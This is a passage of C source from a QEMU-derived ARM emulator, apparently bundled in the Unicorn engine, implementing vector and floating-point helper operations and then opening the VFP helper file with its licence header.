= m_indexed[i * 4 + 0]; uint8_t m1 = m_indexed[i * 4 + 1]; uint8_t m2 = m_indexed[i * 4 + 2]; uint8_t m3 = m_indexed[i * 4 + 3]; do { d[i] += n[i * 4 + 0] * m0 + n[i * 4 + 1] * m1 + n[i * 4 + 2] * m2 + n[i * 4 + 3] * m3; } while (++i < segend); segend = i + 4; } while (i < opr_sz_4); clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sdot_idx_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc), opr_sz_8 = opr_sz / 8; intptr_t index = simd_data(desc); uint64_t *d = vd; int16_t *n = vn; int16_t *m_indexed = (int16_t *)vm + index * 4; /* This is supported by SVE only, so opr_sz is always a multiple of 16. * Process the entire segment all at once, writing back the results * only after we've consumed all of the inputs. */ for (i = 0; i < opr_sz_8 ; i += 2) { uint64_t d0, d1; d0 = n[i * 4 + 0] * (int64_t)m_indexed[i * 4 + 0]; d0 += n[i * 4 + 1] * (int64_t)m_indexed[i * 4 + 1]; d0 += n[i * 4 + 2] * (int64_t)m_indexed[i * 4 + 2]; d0 += n[i * 4 + 3] * (int64_t)m_indexed[i * 4 + 3]; d1 = n[i * 4 + 4] * (int64_t)m_indexed[i * 4 + 0]; d1 += n[i * 4 + 5] * (int64_t)m_indexed[i * 4 + 1]; d1 += n[i * 4 + 6] * (int64_t)m_indexed[i * 4 + 2]; d1 += n[i * 4 + 7] * (int64_t)m_indexed[i * 4 + 3]; d[i + 0] += d0; d[i + 1] += d1; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_idx_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc), opr_sz_8 = opr_sz / 8; intptr_t index = simd_data(desc); uint64_t *d = vd; uint16_t *n = vn; uint16_t *m_indexed = (uint16_t *)vm + index * 4; /* This is supported by SVE only, so opr_sz is always a multiple of 16. * Process the entire segment all at once, writing back the results * only after we've consumed all of the inputs. */ for (i = 0; i < opr_sz_8 ; i += 2) { uint64_t d0, d1; d0 = n[i * 4 + 0] * (uint64_t)m_indexed[i * 4 + 0]; d0 += n[i * 4 + 1] * (uint64_t)m_indexed[i * 4 + 1]; d0 += n[i * 4 + 2] * (uint64_t)m_indexed[i * 4 + 2]; d0 += n[i * 4 + 3] * (uint64_t)m_indexed[i * 4 + 3]; d1 = n[i * 4 + 4] * (uint64_t)m_indexed[i * 4 + 0]; d1 += n[i * 4 + 5] * (uint64_t)m_indexed[i * 4 + 1]; d1 += n[i * 4 + 6] * (uint64_t)m_indexed[i * 4 + 2]; d1 += n[i * 4 + 7] * (uint64_t)m_indexed[i * 4 + 3]; d[i + 0] += d0; d[i + 1] += d1; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcaddh)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float16 *d = vd; float16 *n = vn; float16 *m = vm; float_status *fpst = vfpst; uint32_t neg_real = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = neg_real ^ 1; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 15; neg_imag <<= 15; for (i = 0; i < opr_sz / 2; i += 2) { float16 e0 = n[H2(i)]; float16 e1 = m[H2(i + 1)] ^ neg_imag; float16 e2 = n[H2(i + 1)]; float16 e3 = m[H2(i)] ^ neg_real; d[H2(i)] = float16_add(e0, e1, fpst); d[H2(i + 1)] = float16_add(e2, e3, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcadds)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float32 *d = vd; float32 *n = vn; float32 *m = vm; float_status *fpst = vfpst; uint32_t neg_real = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = neg_real ^ 1; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 31; neg_imag <<= 31; for (i = 0; i < opr_sz / 4; i += 2) { float32 e0 = n[H4(i)]; float32 e1 = m[H4(i + 1)] ^ neg_imag; float32 e2 = n[H4(i + 1)]; float32 e3 = m[H4(i)] ^ neg_real; d[H4(i)] = float32_add(e0, e1, fpst); d[H4(i + 1)] = float32_add(e2, e3, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcaddd)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float64 *d = vd; float64 *n = vn; float64 *m = vm; float_status *fpst = vfpst; uint64_t neg_real = extract64(desc, SIMD_DATA_SHIFT, 1); uint64_t neg_imag = neg_real ^ 1; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 63; neg_imag <<= 63; for (i = 0; i < opr_sz / 8; i += 2) { float64 e0 = n[i]; float64 e1 = m[i + 1] ^ neg_imag; float64 e2 = n[i + 1]; float64 e3 = m[i] ^ neg_real; d[i] = float64_add(e0, e1, fpst); d[i + 1] = float64_add(e2, e3, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlah)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float16 *d = vd; float16 *n = vn; float16 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); uint32_t neg_real = flip ^ neg_imag; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 15; neg_imag <<= 15; for (i = 0; i < opr_sz / 2; i += 2) { float16 e2 = n[H2(i + flip)]; float16 e1 = m[H2(i + flip)] ^ neg_real; float16 e4 = e2; float16 e3 = m[H2(i + 1 - flip)] ^ neg_imag; d[H2(i)] = float16_muladd(e2, e1, d[H2(i)], 0, fpst); d[H2(i + 1)] = float16_muladd(e4, e3, d[H2(i + 1)], 0, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlah_idx)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float16 *d = vd; float16 *n = vn; float16 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); intptr_t index = extract32(desc, SIMD_DATA_SHIFT + 2, 2); uint32_t neg_real = flip ^ neg_imag; intptr_t elements = opr_sz / sizeof(float16); intptr_t eltspersegment = 16 / sizeof(float16); intptr_t i, j; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 15; neg_imag <<= 15; for (i = 0; i < elements; i += eltspersegment) { float16 mr = m[H2(i + 2 * index + 0)]; float16 mi = m[H2(i + 2 * index + 1)]; float16 e1 = neg_real ^ (flip ? mi : mr); float16 e3 = neg_imag ^ (flip ? mr : mi); for (j = i; j < i + eltspersegment; j += 2) { float16 e2 = n[H2(j + flip)]; float16 e4 = e2; d[H2(j)] = float16_muladd(e2, e1, d[H2(j)], 0, fpst); d[H2(j + 1)] = float16_muladd(e4, e3, d[H2(j + 1)], 0, fpst); } } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlas)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float32 *d = vd; float32 *n = vn; float32 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); uint32_t neg_real = flip ^ neg_imag; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 31; neg_imag <<= 31; for (i = 0; i < opr_sz / 4; i += 2) { float32 e2 = n[H4(i + flip)]; float32 e1 = m[H4(i + flip)] ^ neg_real; float32 e4 = e2; float32 e3 = m[H4(i + 1 - flip)] ^ neg_imag; d[H4(i)] = float32_muladd(e2, e1, d[H4(i)], 0, fpst); d[H4(i + 1)] = float32_muladd(e4, e3, d[H4(i + 1)], 0, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlas_idx)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float32 *d = vd; float32 *n = vn; float32 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); intptr_t index = extract32(desc, SIMD_DATA_SHIFT + 2, 2); uint32_t neg_real = flip ^ neg_imag; intptr_t elements = opr_sz / sizeof(float32); intptr_t eltspersegment = 16 / sizeof(float32); intptr_t i, j; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 31; neg_imag <<= 31; for (i = 0; i < elements; i += eltspersegment) { float32 mr = m[H4(i + 2 * index + 0)]; float32 mi = m[H4(i + 2 * index + 1)]; float32 e1 = neg_real ^ (flip ? mi : mr); float32 e3 = neg_imag ^ (flip ? mr : mi); for (j = i; j < i + eltspersegment; j += 2) { float32 e2 = n[H4(j + flip)]; float32 e4 = e2; d[H4(j)] = float32_muladd(e2, e1, d[H4(j)], 0, fpst); d[H4(j + 1)] = float32_muladd(e4, e3, d[H4(j + 1)], 0, fpst); } } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlad)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float64 *d = vd; float64 *n = vn; float64 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint64_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); uint64_t neg_real = flip ^ neg_imag; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 63; neg_imag <<= 63; for (i = 0; i < opr_sz / 8; i += 2) { float64 e2 = n[i + flip]; float64 e1 = m[i + flip] ^ neg_real; float64 e4 = e2; float64 e3 = m[i + 1 - flip] ^ neg_imag; d[i] = float64_muladd(e2, e1, d[i], 0, fpst); d[i + 1] = float64_muladd(e4, e3, d[i + 1], 0, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } #define DO_2OP(NAME, FUNC, TYPE) \ void HELPER(NAME)(void *vd, void *vn, void *stat, uint32_t desc) \ { \ intptr_t i, oprsz = simd_oprsz(desc); \ TYPE *d = vd, *n = vn; \ for (i = 0; i < oprsz / sizeof(TYPE); i++) { \ d[i] = FUNC(n[i], stat); \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_2OP(gvec_frecpe_h, helper_recpe_f16, float16) DO_2OP(gvec_frecpe_s, helper_recpe_f32, float32) DO_2OP(gvec_frecpe_d, helper_recpe_f64, float64) DO_2OP(gvec_frsqrte_h, helper_rsqrte_f16, float16) DO_2OP(gvec_frsqrte_s, helper_rsqrte_f32, float32) DO_2OP(gvec_frsqrte_d, helper_rsqrte_f64, float64) #undef DO_2OP /* Floating-point trigonometric starting value. * See the ARM ARM pseudocode function FPTrigSMul. */ static float16 float16_ftsmul(float16 op1, uint16_t op2, float_status *stat) { float16 result = float16_mul(op1, op1, stat); if (!float16_is_any_nan(result)) { result = float16_set_sign(result, op2 & 1); } return result; } static float32 float32_ftsmul(float32 op1, uint32_t op2, float_status *stat) { float32 result = float32_mul(op1, op1, stat); if (!float32_is_any_nan(result)) { result = float32_set_sign(result, op2 & 1); } return result; } static float64 float64_ftsmul(float64 op1, uint64_t op2, float_status *stat) { float64 result = float64_mul(op1, op1, stat); if (!float64_is_any_nan(result)) { result = float64_set_sign(result, op2 & 1); } return result; } #define DO_3OP(NAME, FUNC, TYPE) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *stat, uint32_t desc) \ { \ intptr_t i, oprsz = simd_oprsz(desc); \ TYPE *d = vd, *n = vn, *m = vm; \ for (i = 0; i < oprsz / sizeof(TYPE); i++) { \ d[i] = FUNC(n[i], m[i], stat); \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_3OP(gvec_fadd_h, float16_add, float16) DO_3OP(gvec_fadd_s, float32_add, float32) DO_3OP(gvec_fadd_d, float64_add, float64) DO_3OP(gvec_fsub_h, float16_sub, float16) DO_3OP(gvec_fsub_s, float32_sub, float32) DO_3OP(gvec_fsub_d, float64_sub, float64) DO_3OP(gvec_fmul_h, float16_mul, float16) DO_3OP(gvec_fmul_s, float32_mul, float32) DO_3OP(gvec_fmul_d, float64_mul, float64) DO_3OP(gvec_ftsmul_h, float16_ftsmul, float16) DO_3OP(gvec_ftsmul_s, float32_ftsmul, float32) DO_3OP(gvec_ftsmul_d, float64_ftsmul, float64) #ifdef TARGET_AARCH64 DO_3OP(gvec_recps_h, helper_recpsf_f16, float16) DO_3OP(gvec_recps_s, helper_recpsf_f32, float32) DO_3OP(gvec_recps_d, helper_recpsf_f64, float64) DO_3OP(gvec_rsqrts_h, helper_rsqrtsf_f16, float16) DO_3OP(gvec_rsqrts_s, helper_rsqrtsf_f32, float32) DO_3OP(gvec_rsqrts_d, helper_rsqrtsf_f64, float64) #endif #undef DO_3OP /* For the indexed ops, SVE applies the index per 128-bit vector segment. * For AdvSIMD, there is of course only one such vector segment. */ #define DO_MUL_IDX(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *stat, uint32_t desc) \ { \ intptr_t i, j, oprsz = simd_oprsz(desc), segment = 16 / sizeof(TYPE); \ intptr_t idx = simd_data(desc); \ TYPE *d = vd, *n = vn, *m = vm; \ for (i = 0; i < oprsz / sizeof(TYPE); i += segment) { \ TYPE mm = m[H(i + idx)]; \ for (j = 0; j < segment; j++) { \ d[i + j] = TYPE##_mul(n[i + j], mm, stat); \ } \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_MUL_IDX(gvec_fmul_idx_h, float16, H2) DO_MUL_IDX(gvec_fmul_idx_s, float32, H4) DO_MUL_IDX(gvec_fmul_idx_d, float64, ) #undef DO_MUL_IDX #define DO_FMLA_IDX(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *va, \ void *stat, uint32_t desc) \ { \ intptr_t i, j, oprsz = simd_oprsz(desc), segment = 16 / sizeof(TYPE); \ TYPE op1_neg = extract32(desc, SIMD_DATA_SHIFT, 1); \ intptr_t idx = desc >> (SIMD_DATA_SHIFT + 1); \ TYPE *d = vd, *n = vn, *m = vm, *a = va; \ op1_neg <<= (8 * sizeof(TYPE) - 1); \ for (i = 0; i < oprsz / sizeof(TYPE); i += segment) { \ TYPE mm = m[H(i + idx)]; \ for (j = 0; j < segment; j++) { \ d[i + j] = TYPE##_muladd(n[i + j] ^ op1_neg, \ mm, a[i + j], 0, stat); \ } \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_FMLA_IDX(gvec_fmla_idx_h, float16, H2) DO_FMLA_IDX(gvec_fmla_idx_s, float32, H4) DO_FMLA_IDX(gvec_fmla_idx_d, float64, ) #undef DO_FMLA_IDX #define DO_SAT(NAME, WTYPE, TYPEN, TYPEM, OP, MIN, MAX) \ void HELPER(NAME)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) \ { \ intptr_t i, oprsz = simd_oprsz(desc); \ TYPEN *d = vd, *n = vn; TYPEM *m = vm; \ bool q = false; \ for (i = 0; i < oprsz / sizeof(TYPEN); i++) { \ WTYPE dd = (WTYPE)n[i] OP m[i]; \ if (dd < MIN) { \ dd = MIN; \ q = true; \ } else if (dd > MAX) { \ dd = MAX; \ q = true; \ } \ d[i] = dd; \ } \ if (q) { \ uint32_t *qc = vq; \ qc[0] = 1; \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_SAT(gvec_uqadd_b, int, uint8_t, uint8_t, +, 0, UINT8_MAX) DO_SAT(gvec_uqadd_h, int, uint16_t, uint16_t, +, 0, UINT16_MAX) DO_SAT(gvec_uqadd_s, int64_t, uint32_t, uint32_t, +, 0, UINT32_MAX) DO_SAT(gvec_sqadd_b, int, int8_t, int8_t, +, INT8_MIN, INT8_MAX) DO_SAT(gvec_sqadd_h, int, int16_t, int16_t, +, INT16_MIN, INT16_MAX) DO_SAT(gvec_sqadd_s, int64_t, int32_t, int32_t, +, INT32_MIN, INT32_MAX) DO_SAT(gvec_uqsub_b, int, uint8_t, uint8_t, -, 0, UINT8_MAX) DO_SAT(gvec_uqsub_h, int, uint16_t, uint16_t, -, 0, UINT16_MAX) DO_SAT(gvec_uqsub_s, int64_t, uint32_t, uint32_t, -, 0, UINT32_MAX) DO_SAT(gvec_sqsub_b, int, int8_t, int8_t, -, INT8_MIN, INT8_MAX) DO_SAT(gvec_sqsub_h, int, int16_t, int16_t, -, INT16_MIN, INT16_MAX) DO_SAT(gvec_sqsub_s, int64_t, int32_t, int32_t, -, INT32_MIN, INT32_MAX) #undef DO_SAT void HELPER(gvec_uqadd_d)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); uint64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { uint64_t nn = n[i], mm = m[i], dd = nn + mm; if (dd < nn) { dd = UINT64_MAX; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_uqsub_d)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); uint64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { uint64_t nn = n[i], mm = m[i], dd = nn - mm; if (nn < mm) { dd = 0; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_sqadd_d)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); int64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { int64_t nn = n[i], mm = m[i], dd = nn + mm; if (((dd ^ nn) & ~(nn ^ mm)) & INT64_MIN) { dd = (nn >> 63) ^ ~INT64_MIN; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_sqsub_d)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); int64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { int64_t nn = n[i], mm = m[i], dd = nn - mm; if (((dd ^ nn) & (nn ^ mm)) & INT64_MIN) { dd = (nn >> 63) ^ ~INT64_MIN; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } /* * Convert float16 to float32, raising no exceptions and * preserving exceptional values, including SNaN. * This is effectively an unpack+repack operation. */ static float32 float16_to_float32_by_bits(uint32_t f16, bool fz16) { const int f16_bias = 15; const int f32_bias = 127; uint32_t sign = extract32(f16, 15, 1); uint32_t exp = extract32(f16, 10, 5); uint32_t frac = extract32(f16, 0, 10); if (exp == 0x1f) { /* Inf or NaN */ exp = 0xff; } else if (exp == 0) { /* Zero or denormal. */ if (frac != 0) { if (fz16) { frac = 0; } else { /* * Denormal; these are all normal float32. * Shift the fraction so that the msb is at bit 11, * then remove bit 11 as the implicit bit of the * normalized float32. Note that we still go through * the shift for normal numbers below, to put the * float32 fraction at the right place. */ int shift = clz32(frac) - 21; frac = (frac << shift) & 0x3ff; exp = f32_bias - f16_bias - shift + 1; } } } else { /* Normal number; adjust the bias. */ exp += f32_bias - f16_bias; } sign <<= 31; exp <<= 23; frac <<= 23 - 10; return sign | exp | frac; } static uint64_t load4_f16(uint64_t *ptr, int is_q, int is_2) { /* * Branchless load of u32[0], u64[0], u32[1], or u64[1]. * Load the 2nd qword iff is_q & is_2. * Shift to the 2nd dword iff !is_q & is_2. * For !is_q & !is_2, the upper bits of the result are garbage. */ return ptr[is_q & is_2] >> ((is_2 & ~is_q) << 5); } /* * Note that FMLAL requires oprsz == 8 or oprsz == 16, * as there is not yet SVE versions that might use blocking. */ static void do_fmlal(float32 *d, void *vn, void *vm, float_status *fpst, uint32_t desc, bool fz16) { intptr_t i, oprsz = simd_oprsz(desc); int is_s = extract32(desc, SIMD_DATA_SHIFT, 1); int is_2 = extract32(desc, SIMD_DATA_SHIFT + 1, 1); int is_q = oprsz == 16; uint64_t n_4, m_4; /* Pre-load all of the f16 data, avoiding overlap issues. */ n_4 = load4_f16(vn, is_q, is_2); m_4 = load4_f16(vm, is_q, is_2); /* Negate all inputs for FMLSL at once. */ if (is_s) { n_4 ^= 0x8000800080008000ull; } for (i = 0; i < oprsz / 4; i++) { float32 n_1 = float16_to_float32_by_bits(n_4 >> (i * 16), fz16); float32 m_1 = float16_to_float32_by_bits(m_4 >> (i * 16), fz16); d[H4(i)] = float32_muladd(n_1, m_1, d[H4(i)], 0, fpst); } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_fmlal_a32)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal(vd, vn, vm, &env->vfp.standard_fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } void HELPER(gvec_fmlal_a64)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal(vd, vn, vm, &env->vfp.fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } static void do_fmlal_idx(float32 *d, void *vn, void *vm, float_status *fpst, uint32_t desc, bool fz16) { intptr_t i, oprsz = simd_oprsz(desc); int is_s = extract32(desc, SIMD_DATA_SHIFT, 1); int is_2 = extract32(desc, SIMD_DATA_SHIFT + 1, 1); int index = extract32(desc, SIMD_DATA_SHIFT + 2, 3); int is_q = oprsz == 16; uint64_t n_4; float32 m_1; /* Pre-load all of the f16 data, avoiding overlap issues. */ n_4 = load4_f16(vn, is_q, is_2); /* Negate all inputs for FMLSL at once. */ if (is_s) { n_4 ^= 0x8000800080008000ull; } m_1 = float16_to_float32_by_bits(((float16 *)vm)[H2(index)], fz16); for (i = 0; i < oprsz / 4; i++) { float32 n_1 = float16_to_float32_by_bits(n_4 >> (i * 16), fz16); d[H4(i)] = float32_muladd(n_1, m_1, d[H4(i)], 0, fpst); } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_fmlal_idx_a32)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal_idx(vd, vn, vm, &env->vfp.standard_fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } void HELPER(gvec_fmlal_idx_a64)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal_idx(vd, vn, vm, &env->vfp.fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } void HELPER(gvec_sshl_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); int8_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; ++i) { int8_t mm = m[i]; int8_t nn = n[i]; int8_t res = 0; if (mm >= 0) { if (mm < 8) { res = nn << mm; } } else { res = nn >> (mm > -8 ? -mm : 7); } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sshl_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); int16_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 2; ++i) { int8_t mm = m[i]; /* only 8 bits of shift are significant */ int16_t nn = n[i]; int16_t res = 0; if (mm >= 0) { if (mm < 16) { res = nn << mm; } } else { res = nn >> (mm > -16 ? -mm : 15); } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_ushl_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint8_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; ++i) { int8_t mm = m[i]; uint8_t nn = n[i]; uint8_t res = 0; if (mm >= 0) { if (mm < 8) { res = nn << mm; } } else { if (mm > -8) { res = nn >> -mm; } } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_ushl_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint16_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 2; ++i) { int8_t mm = m[i]; /* only 8 bits of shift are significant */ uint16_t nn = n[i]; uint16_t res = 0; if (mm >= 0) { if (mm < 16) { res = nn << mm; } } else { if (mm > -16) { res = nn >> -mm; } } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* * 8x8->8 polynomial multiply. * * Polynomial multiplication is like integer multiplication except the * partial products are XORed, not added. * * TODO: expose this as a generic vector operation, as it is a common * crypto building block. */ void HELPER(gvec_pmul_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; ++i) { uint64_t nn = n[i]; uint64_t mm = m[i]; uint64_t rr = 0; for (j = 0; j < 8; ++j) { uint64_t mask = (nn & 0x0101010101010101ull) * 0xff; rr ^= mm & mask; mm = (mm << 1) & 0xfefefefefefefefeull; nn >>= 1; } d[i] = rr; } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* * 64x64->128 polynomial multiply. * Because of the lanes are not accessed in strict columns, * this probably cannot be turned into a generic helper. */ void HELPER(gvec_pmull_q)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); intptr_t hi = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; i += 2) { uint64_t nn = n[i + hi]; uint64_t mm = m[i + hi]; uint64_t rhi = 0; uint64_t rlo = 0; /* Bit 0 can only influence the low 64-bit result. */ if (nn & 1) { rlo = mm; } for (j = 1; j < 64; ++j) { #ifdef _MSC_VER uint64_t mask = 0 - ((nn >> j) & 1); #else uint64_t mask = -((nn >> j) & 1); #endif rlo ^= (mm << j) & mask; rhi ^= (mm >> (64 - j)) & mask; } d[i] = rlo; d[i + 1] = rhi; } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* * 8x8->16 polynomial multiply. * * The byte inputs are expanded to (or extracted from) half-words. * Note that neon and sve2 get the inputs from different positions. * This allows 4 bytes to be processed in parallel with uint64_t. */ static uint64_t expand_byte_to_half(uint64_t x) { return (x & 0x000000ff) | ((x & 0x0000ff00) << 8) | ((x & 0x00ff0000) << 16) | ((x & 0xff000000) << 24); } static uint64_t pmull_h(uint64_t op1, uint64_t op2) { uint64_t result = 0; int i; for (i = 0; i < 8; ++i) { uint64_t mask = (op1 & 0x0001000100010001ull) * 0xffff; result ^= op2 & mask; op1 >>= 1; op2 <<= 1; } return result; } void HELPER(neon_pmull_h)(void *vd, void *vn, void *vm, uint32_t desc) { int hi = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; uint64_t nn = n[hi], mm = m[hi]; d[0] = pmull_h(expand_byte_to_half(nn), expand_byte_to_half(mm)); nn >>= 32; mm >>= 32; d[1] = pmull_h(expand_byte_to_half(nn), expand_byte_to_half(mm)); clear_tail(d, 16, simd_maxsz(desc)); } #ifdef TARGET_AARCH64 void HELPER(sve2_pmull_h)(void *vd, void *vn, void *vm, uint32_t desc) { int shift = simd_data(desc) * 8; intptr_t i, opr_sz = simd_oprsz(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; ++i) { uint64_t nn = (n[i] >> shift) & 0x00ff00ff00ff00ffull; uint64_t mm = (m[i] >> shift) & 0x00ff00ff00ff00ffull; d[i] = pmull_h(nn, mm); } } #endif �������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/vfp_helper.c����������������������������������������������������������0000664�0000000�0000000�00000121305�14675241067�0020520�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM VFP floating-point operations * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "internals.h" #include "qemu/log.h" #include "fpu/softfloat.h" /* VFP support. We follow the convention used for VFP instructions: Single precision routines have a "s" suffix, double precision a "d" suffix. */ /* Convert host exception flags to vfp form. */ static inline int vfp_exceptbits_from_host(int host_bits) { int target_bits = 0; if (host_bits & float_flag_invalid) { target_bits |= 1; } if (host_bits & float_flag_divbyzero) { target_bits |= 2; } if (host_bits & float_flag_overflow) { target_bits |= 4; } if (host_bits & (float_flag_underflow | float_flag_output_denormal)) { target_bits |= 8; } if (host_bits & float_flag_inexact) { target_bits |= 